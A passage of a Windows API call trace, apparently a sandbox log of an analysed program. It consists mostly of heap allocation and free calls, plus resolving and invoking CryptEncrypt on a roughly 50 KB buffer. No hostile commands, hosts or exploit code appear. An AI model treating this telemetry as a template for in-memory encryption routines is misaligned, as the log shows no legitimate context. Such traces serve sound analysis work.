(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0165.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0165.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0165.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0165.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0165.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0165.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0165.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0165.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0165.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0165.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0165.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0165.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0165.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0165.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0165.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0165.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0165.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0165.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0165.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0165.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0165.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0165.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0165.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0165.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0165.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0165.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0165.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0165.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0165.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0165.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0165.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0165.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0165.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0165.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0165.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34be740 | out: hHeap=0x25c0000) returned 1 [0165.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0165.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0165.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0165.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.325] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0165.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0165.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0165.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0165.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0165.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0165.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0165.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0165.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0165.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0165.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0165.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0165.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0165.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0165.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0165.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0165.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0165.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa580, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0165.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0165.327] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0165.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0165.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0165.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0165.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0165.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0165.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0165.328] CryptEncrypt (in: hKey=0xaa55e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xc4e7, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xc4e8) returned 1 [0165.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0165.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0165.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0165.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0165.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0165.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0165.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0165.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0165.329] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.329] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.329] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.329] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.329] CharLowerBuffW (in: lpsz="byte[50408]", cchLength=0xb | out: lpsz="byte[50408]") returned 0xb [0165.330] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.331] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.331] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.331] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0165.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0165.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0165.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0165.332] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.332] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.332] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0165.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0165.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0165.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0165.332] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0165.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0165.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0165.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.333] CryptEncrypt (in: hKey=0xaa55e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34be740*, pdwDataLen=0x8bef68*=0xc4e7, dwBufLen=0xc4e8 | out: pbData=0x34be740*, pdwDataLen=0x8bef68*=0xc4e8) returned 1 [0165.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0165.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0165.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0165.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0165.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0165.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0165.334] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0165.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0165.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0165.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0165.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0165.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0165.334] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.334] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0165.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0165.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0165.335] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0165.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0165.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0165.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0165.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0165.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 